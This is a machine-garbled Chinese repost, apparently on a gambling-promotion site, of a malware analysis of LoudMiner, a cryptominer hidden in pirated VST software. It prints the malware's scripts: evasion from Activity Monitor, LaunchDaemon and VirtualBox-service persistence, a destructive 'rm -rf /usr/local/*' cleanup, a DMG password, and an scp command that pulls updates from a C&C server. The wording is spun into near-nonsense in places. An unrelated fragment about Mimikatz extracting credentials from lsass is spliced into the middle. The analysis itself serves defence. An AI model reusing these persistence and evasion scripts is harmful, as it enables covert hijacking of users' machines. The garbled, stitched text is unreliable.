LoudMiner:伪装在VST软件中的跨平台挖矿软件 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

LoudMiner:伪装在VST软件中的跨平台挖矿软件

申博_新闻事件 申博 171次浏览 已收录 0个评论

引见

在五花八门的加密泉币挖矿顺序中,LoudMiner显得有些分歧寻常。LoudMiner于2018年8月被发明,重要针对macOS和Windows体系。它能经由历程一些假造软件,如macOS上的QEMU和Windows上的VirtualBox,在Tiny Core Linux假造机上举行加密泉币发掘运动——这类体式格局使之在面临分歧操纵体系时具有很强的适应性。LoudMiner常与盗版的VST(假造事情室手艺)软件绑缚在一同,让下载的用户不知不觉中招。LoudMiner基于XMRig (一款门罗币挖矿顺序),并用到了矿池,这让我们没法追溯潜伏的交易历程。

散布

在撰写本文时,我们在一个WordPress站点上发明了137个VST相干运用顺序(42个用于Windows,95个用于macOS),该站点的域名于2018年8月24日注册。第一个运用顺序——用于Windows的Kontakt Native Instruments 5.7——也是在注册当天上传的。考虑到运用的数目,对它们逐一剖析会有些不切现实,不外我们能够先把它们都视作歹意木马对待。

挖矿顺序本身则不在此站点上,而是托管在别的29个外部效劳器中,效劳器可见文末的IoC列表。由于LoudMiner背地的操纵职员经常对其做更新,我们很难跟踪到它的第一个版本。

LoudMiner之所以挑选与音频制造软件绑定,我们预测可能有以下几点缘由,一是装置这些VST软件的机械每每具有优越的处置惩罚才能;二是音频处置惩罚的高CPU斲丧可能会掩饰挖矿的踪影,让用户难以发觉;另外,这些VST软件一般很庞杂,能够借用它们大文件的外壳欲盖弥彰,假装VM映像的存在。攻击者挑选运用假造机而不是更精简的计划,这一决议虽不罕见实则却异常有用。

以下是攻击者绑缚的一些VST软件样本,以及网站上诱运用户下载的一些“好评”:

· Propellerhead Reason

· Ableton Live

· Sylenth1

· Nexus

· Reaktor 6

· AutoTune

LoudMiner:伪装在VST软件中的跨平台挖矿软件

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图1、图2:该站点管理员对用户的复兴

用户反应

我们观察到,也有一些用户在该站点反应历程说qemu-system-x86_64在他们的Mac上占用了100%的CPU:

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图3.用户申报#1(https://discussions.apple.com/thread/250064603)

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图4.用户申报#2(https://toster.ru/q/608325)

名为“Macloni”的用户透露表现:

我将不得不重新装置OSX。题目多是出在了Ableton Live 10身上,我没有从官方网站下载,结果在装置软件的同时也安上了挖矿顺序,完整占有了我的电脑内存。

同时该用户指导出有2个历程——qemu-system-x86_64和tools-service——占用了25%的CPU资本且以root身份运转。

盗版软件剖析

攻击者对macOS和Windows运用顺序设想的整体思绪是一样的:

· 起首,运用顺序与假造化软件、Linux映像和用于完成耐久性的附加文件绑缚在一同。

· 用户下载运用顺序后依照申明举行装置。

· 先装置扬声器采集器,再装置现实的VST软件。

· LoudMiner隐蔽本身,并在重启时变成耐久性。

· 启动Linux假造机并最先发掘事情。

· 假造机中的剧本与C&C效劳器联络来更新矿机(设置装备摆设和二进制文件)。

在剖析分歧的运用顺序时,我们已肯定了四个版本的挖矿机,重若是经由历程它与现实软件、C&C效劳器域绑缚在一同的体式格局,以及作者建立的版本字符串来辨别。

3个macOS的版本

到目前为止,我们已辨认出这款歹意软件的三个macOS版本。它们都是将本身复制到/usr/local/bin,也都包罗了installerdata.dmg中运转QEMU所需的依靠项,并对运转历程设置了恰当的权限。每一个挖矿机都能够同时运转两个映像,每一个映像占用128 MB的RAM和一个CPU核。耐久性则是经由历程将RunAtLoad设置为true,并在/Library/LaunchDaemons中增加plist文件来完成的;同时还将KeepAlive设置为true,以确保住手后历程重新启动。每一个版本都有以下组件:

· QEMU Linux映像。

· 用于启动QEMU映像的Shell剧本。

· 保卫历程,用于在启动时启动shell剧本并使其运转。

· 一个带有保卫历程的CPU监视器shell剧本,它能够依据CPU运用状况和运动监视器历程是不是正在运转来启动/住手发掘。

CPU监视器剧本能够经由历程加载保卫历程来启动发掘运动,停止历程来完毕发掘。若是Activity Monitor历程正在运转,则发掘将住手。另外,它会搜检体系余暇了多长时候(以秒为单元):

ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'

若是凌驾2分钟,则最先发掘;如不到2分钟,则搜检总CPU运用率:

ps -A -o %cpu | awk '{s+=$1} END {print s }'

除以CPU核数:

sysctl hw.logicalcpu |awk '{print $2 }')

若是大于85%,就住手发掘。分歧版本的剧本本身略有分歧,但整体思绪是雷同的。

装置完成后,会删除一切挖矿机相干装置文件。

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图5. Polyverse.Music.Manipulator.v1.0.1.macOS.dmg的装置

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图6. Polyverse.Music.Manipulator.v1.0.1.macOS.dmg设置申明

版本1

下载的运用顺序包中的挖矿机文件没有经由隐约处置惩罚或放在另一个包中; 它们与软件一同装置鄙人列地位:

1、/Library/Application Support/.Qemusys

· qemu-system-x86_64 – 清洁的QEMU二进制文件

· sys00_1-disk001.qcow2 – Linux 映像 (初始)

· qemuservice – 经由历程qemu-system-x86_64二进制文件启动初始映像的shell剧本(拜见剧本1代码段)

2、/Library/Application Support/.System-Monitor

system-monitor.daemon –经由历程system-monitor二进制文件启动第一个映像

3、/usr/local/bin

.Tools-Service

· sys00_1-disk001.qcow2 – Linux 映像(第二个)

· tools-service.daemon –经由历程tools-service二进制文件启动第二个映像

· cpumonitor – 依据余暇时候和CPU运用状况启动/住手发掘

· system-monitor – qemu-system-x86_64二进制文件的副本

· tools-service – qemu-system-x86_64二进制文件的副本

4、/Library/LaunchDaemons

· buildtools.system-monitor.plist – 启动system-monitor.daemon

· buildtools.tools-service.plist – 启动tools-service.daemon

· modulesys.qemuservice.plist – 启动qemuservice

· systools.cpumonitor.plist – 启动cpumonitor

#!/bin/bash
function start {
pgrep "Activity Monitor"
if [ $? -eq 0 ]; then
launchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist
else
/usr/local/bin/qemu-system-x86_64 -M accel=hvf --cpu host /Library/Application\ Support/.Qemusys/sys00_1-disk001.qcow2 -display none
fi
}
start;

剧本1. qemuservice shell剧本

复制依靠项后,将启动一切与矿机相干的保卫顺序,然后装置现实软件:

1.若是Activity Monitor历程正在运转,qemuservice将不会启动映像,并卸载它所启动的plist。

2.tools-service.daemon仅在qemu-system-x86_64历程未运转且就寝45分钟后才会启动映像。

3.只要在检测到Intel i5,i7或i9 CPU时,System-monitor.daemon才会启动映像。

这些剧本运用雷同的敕令来启动QEMU映像,只是称号和映像途径分歧。

与版本1挖矿机相干的截图:

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图7.运用Little Snitch的QEMU的CPU斲丧(泉源:https://imgur.com/a/sc3u6kk)

Mimikatz中sekurlsa::wdigest的实现

0x00 前言 Mimikatz中sekurlsa::wdigest是渗透测试中经常会用到的功能,它能够从lsass进程中提取凭据,通常可获得已登录用户的明文口令(Windows Server 2008 R2及更高版本的系统默认无法获得,需要修改注册表等待用户再次登录才能获得)。 XPN在他的博客中记录了对WDigest的研究心得,开源了一个POC,通过C++实现了在Win10_1809 x64下从lsass进程中提取凭据。 本文将会对XPN的POC进行扩展,使其支持Win7/Win8/Windows Server2008/Windows Server2008 R2/Windows Server2012/Windows Server2012 R2,记录程序实现的细节与过程。 0x02 简介 本文将要介绍以下内容: · 实现思路 · 程序实现细节 0x03 实现思路 1.提升至Debug权限。 2.获得

上图来自Little Snitch,透露表现来自历程qemu-system-x86_64的某些衔接被阻挠。详细来说,hopto[.]org (一个免费的主机名效劳)是挖矿机版本1运用的C&C。

版本2

挖矿机文件位于下载的运用顺序包内的data_installer.pkg中。将先装置data_installer.pkg,其次再装置VST软件,且在装置之前,会将版本1删除并实行以下敕令:

rm -rf /usr/local/*

如剧本2中的列表所示,它仅在检测到正在运转的qemu-system-x86_64历程时才会如许做。

#!/bin/bash
#Clear Old
function clear {
LGC=`ps aux |grep "qemu-system-x86_64" |wc -l`
if [ $LGC -ge 2 ]
Then
launchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist
launchctl unload -w /Library/LaunchDaemons/com.buildtools.tools-service.plist
launchctl unload -w /Library/LaunchDaemons/com.buildtools.system-monitor.plist
launchctl unload -w /Library/LaunchDaemons/com.systools.cpumonitor.plist
rm -f /Library/LaunchDaemons/com.buildtools.system-monitor.plist
rm -f /Library/LaunchDaemons/com.modulesys.qemuservice.plist
rm -f /Library/LaunchDaemons/com.buildtools.tools-service.plist
rm -f /Library/LaunchDaemons/com.systools.cpumonitor.plist
rm -rf /Library/Application\ Support/.Qemusys
rm -rf /usr/local/bin/.Tools-Service
rm -rf /Library/Application\ Support/.System-Monitor/
rm -rf /usr/local/*
fi
exit 0
}
clear;

剧本2的 data_installer.pkg预装置剧本,用于删除版本1。

并建立以下临时文件:

/Users/Shared

· z1 – QEMU二进制文件

· z1.daemon – 运用QEMU二进制文件启动QEMU映像

· z1.qcow2  –  QEMU映像

· z1.plist  – 启动z1.daemon

· z3  –  CPU监视器剧本,与版本1 cpumonitor比拟转变不大

· z3.plist  – 用于启动z3

· randwd  – 天生随机称号

复制依靠项后将装置矿机。此次运用randwd剧本随机化QEMU二进制文件、plists和目次的称号。挖矿机装置历程会建立z1,z1.daemon,z1.qcow2和z1.plist的两个副本。关于每一个副本,会发生以下状况:

· 在/ Library / Application Support中建立具有随机称号的目次

· QEMU二进制文件z1具有与目次雷同的称号,并被复制到/ usr / local / bin中

· z1.daemon(拜见剧本3中的列表)和z1.qcow2以随机称号复制到此目次中

· z1.plist以称号com.<random_name>.plist复制到/ Library / LaunchDaemons中

#!/bin/bash
function start {
pgrep "Activity Monitor"
if [ $? -eq 0 ]; then
launchctl unload -w /Library/LaunchDaemons/com.AAAA.plist
else
/usr/local/bin/BBBB -M accel=hvf --cpu host /Library/Application\ Support/CCCC/DDDD -display none
fi
}
start;

剧本3. z1.daemon shell剧本

版本2比版本1更清楚简朴。只要一个QEMU映像两个副本; 映像启动器剧本,保卫历程和cpumonitor是雷同的。只管版本2随机化了文件和

目次,但它只能装置一次,由于装置时会在敕令行中运用accel = hvf搜检正在运转的历程。

从我们到目前为止搜检到的版本2运用顺序,data_installer.pkg的SHA1哈希始终是39a7e86368f0e68a86cce975fd9d8c254a86ed93。

版本3

挖矿机文件位于运用顺序包内名为do.dmg的加密DMG文件中,装置DMG运用以下敕令:

printf '%s\0' 'VeryEasyPass123!' | hdiutil attach -noverify /Users/Shared/instapack/do.dmg -stdinpass.

矿机DMG里有一个datainstallero.pkg包,再装置此软件包。

datainstallero.pkg与版本2的data_installer.pkg包内容大抵雷同,但datainstallero.pkg增加了两个殽杂的剧本——clearpacko.sh和installpacko.sh,还殽杂了之前的剧本randwd:

· clearpacko.sh用于删除版本2。

· installpacko.sh以与版本2雷同的体式格局装置矿机,除从剧本中删除解释以外。

· do.dmg的SHA1连结稳定:b676fdf3ece1ac4f96a2ff3abc7df31c7b867fb9。

Linux映像

一切的版本都应用多个shell剧正本启动映像文件。shell剧本在指导时由plist实行,并连结运动状况。

版本1实行以下二进制文件(qemu-system-x86_64的副本)以启动QEMU映像:qemu-system-x86_64,system-monitor,tools-service。

版本2和3运用雷同的敕令,但二进制文件的文件名、Application Support中的目次和QEMU文件名是随机的。

一切版本都运用以下转换:

· -M accel = hvf运用Hypervisor(https://developer.apple.com/documentation/hypervisor)框架作为加速器。 HVF是在OS X 10.10中引入的,并且在2018年4月宣布的QEMU 2.12中增加了对HVF的支撑。

· -display none,以便假造机在没有图形界面的状况下运转。

由于未指定RAM量和CPU内核数目,这类状况下启动映像运用的是默认值:1个CPU内核和128MB RAM。一切版本都能够启动2个映像。

Windows(版本4)

从运用顺序中提取的字符串中,我们界说了到目前为止所见的独一Windows版本,其逻辑与macOS版本异常类似。用户下载的运用顺序是破解的运用顺序,加上封装为MSI装置顺序的挖矿机。图8显现了运转破解的VST装置顺序时,弹出的VirtualBox驱动装置信托窗口。

LoudMiner:伪装在VST软件中的跨平台挖矿软件

图8.弹出窗口

VirtualBox装置在它通例的文件夹(C:\Program Files\Oracle)中;然则,目次的属性被设置为“hidden”。以后装置顺序将Linux映像和VBoxVmService(用于将VirtualBox假造机作为效劳运转的Windows效劳)复制到C:\ vms,这也是一个隐蔽目次。装置完成后,装置顺序将运转由BAT2EXE编译的批处置惩罚剧本(请参阅剧本4),以导入Linux映像并运转VmServiceControl.exe以将假造机作为效劳启动。

@echo off
setlocal EnableExtensions EnableDelayedExpansion
"c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" setproperty machinefolder "%userprofile%\appdata\roaming"
"c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" import "c:\vms\tmp\sys00_1.ova"
xcopy /Y "C:\Windows\System32\Config\systemprofile\.VirtualBox" "C:\vms\.VirtualBox\"
"C:\vms\VmServiceControl.exe" -i
del /F "c:\vms\tmp\sys00_1.ova"

剧本4.用于将Linux假造机作为效劳运转的批处置惩罚剧本 

此要领用于确保重启后的耐久。现实上,VboxVmService附带了一个设置装备摆设文件(拜见剧本5),个中能够启用AutoStart选项,以便在机械启动时自动启动假造机。

[Settings]
VBOX_USER_HOME=C:\vms\.VirtualBox
RunWebService=no
PauseShutdown=5000
[Vm0]
VmName=sys00_1
ShutdownMethod=acpipowerbutton
AutoStart=yes

剧本5.VBoxVmService的设置装备摆设文件,启用了AutoStart

Linux映像中包罗的OVF文件形貌了假造机的硬件设置装备摆设(请参阅剧本6):它运用1GB的RAM和2个CPU核(最大运用率为90%)。

<Hardware>
<CPU count="2" executionCap="90">
<PAE enabled="true"/>
<LongMode enabled="true"/>
<X2APIC enabled="true"/>
<HardwareVirtExLargePages enabled="true"/>
</CPU>
<Memory RAMSize="1024"/>

剧本6.Linux映像的硬件设置装备摆设

Linux映像

Linux映像是一个设置装备摆设为运转XMRig的Tiny Core Linux 9.0,另有一些文件和剧本,以使发掘顺序不断更新。最风趣的文件是:

· /root/.ssh/{id_rsa,id_rsa.pub}  – 用于运用SCP从C&C效劳器更新挖矿机的SSH对密钥。

· /opt/{bootsync.sh,bootlocal.sh}  – 从C&C效劳器更新挖矿机并运转的体系启动敕令(拜见剧本7和8):

/usr/bin/sethostname box
/opt/bootlocal.sh 2>&1 > /dev/null &
echo "booting" > /etc/sysconfig/noautologin

剧本7.bootsync.sh

/mnt/sda1/tools/bin/idgenerator 2>&1 > /dev/null
/mnt/sda1/tools/bin/xmrig_update 2>&1 > /dev/null
/mnt/sda1/tools/bin/ccommand_update 2>&1 > /dev/null
/mnt/sda1/tools/bin/ccommand 2>&1 > /dev/null
/mnt/sda1/tools/bin/xmrig

剧本8. bootlocal.sh

· / mnt / sda1 / tools / bin  – 用于更新和运转挖矿机的重要文件和剧本。

· / mnt / sda1 / tools / xmrig  – 包罗XMRig的源代码(来自GitHub(https://github.com/xmrig/xmrig))。

矿机的设置装备摆设存储在/mnt/sda1/tools/bin/config.json中,重要包罗用于矿池的域名和端口,详细取决于版本型号(请参阅IoC局部中的示例)。

更新机制由三个分歧的剧本经由历程SCP(平安文件复制)实行,三个剧本分别是:

· xmrig_update  – 更新矿机的设置装备摆设(config.json);

· ccommand  – 更新ccommand_update,xmrig_update(拜见剧本9),updater.sh,xmrig;

· ccommand_update  – 更新ccommand。

从我们看到的状况来看,矿机的设置装备摆设是天天更新一次的。

#!/bin/sh

ping -w 40 127.0.0.1
cd /mnt/sda1/tools/bin/ && scp -P 5100 -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]:ctrl/cowboinvox`date +%Y%m%d` config.json.new && mv config.json config.json.bkp && mv config.json.new config.json

剧本9. xmrig_update

为了辨认特定的发掘会话,idgenerator剧本会建立一个包罗机械的IP地点和日期的文件,并用update .sh剧本将其输出发送到C&C效劳器。

珍爱计划

明显,要提防此类要挟,最好就是不要下载商业软件的盗版副本。除此以外,也有一些提醒能够帮助您肯定运用顺序中是不是包罗了附加的代码:

· 一些不沾边的“附加”装置顺序(在本例中为Oracle网络适配器)的信托弹出窗口。

· 没有装置的历程(本例中为QEMU或VirtualBox)却占用了大批的CPU。

· 有新效劳增加到启动效劳列表(Windows)或新的启动保卫顺序(macOS)中去。

· 一些新鲜域名的网络衔接(比方system-update [.] info或system-check [.] services)。

IoC

hash

· macOS运用顺序(版本1-3)

LoudMiner:伪装在VST软件中的跨平台挖矿软件

· Windows运用顺序(版本4)

LoudMiner:伪装在VST软件中的跨平台挖矿软件

· Linux映像

原文地点: https://www.4hou.com/web/18736.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明LoudMiner:伪装在VST软件中的跨平台挖矿软件
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址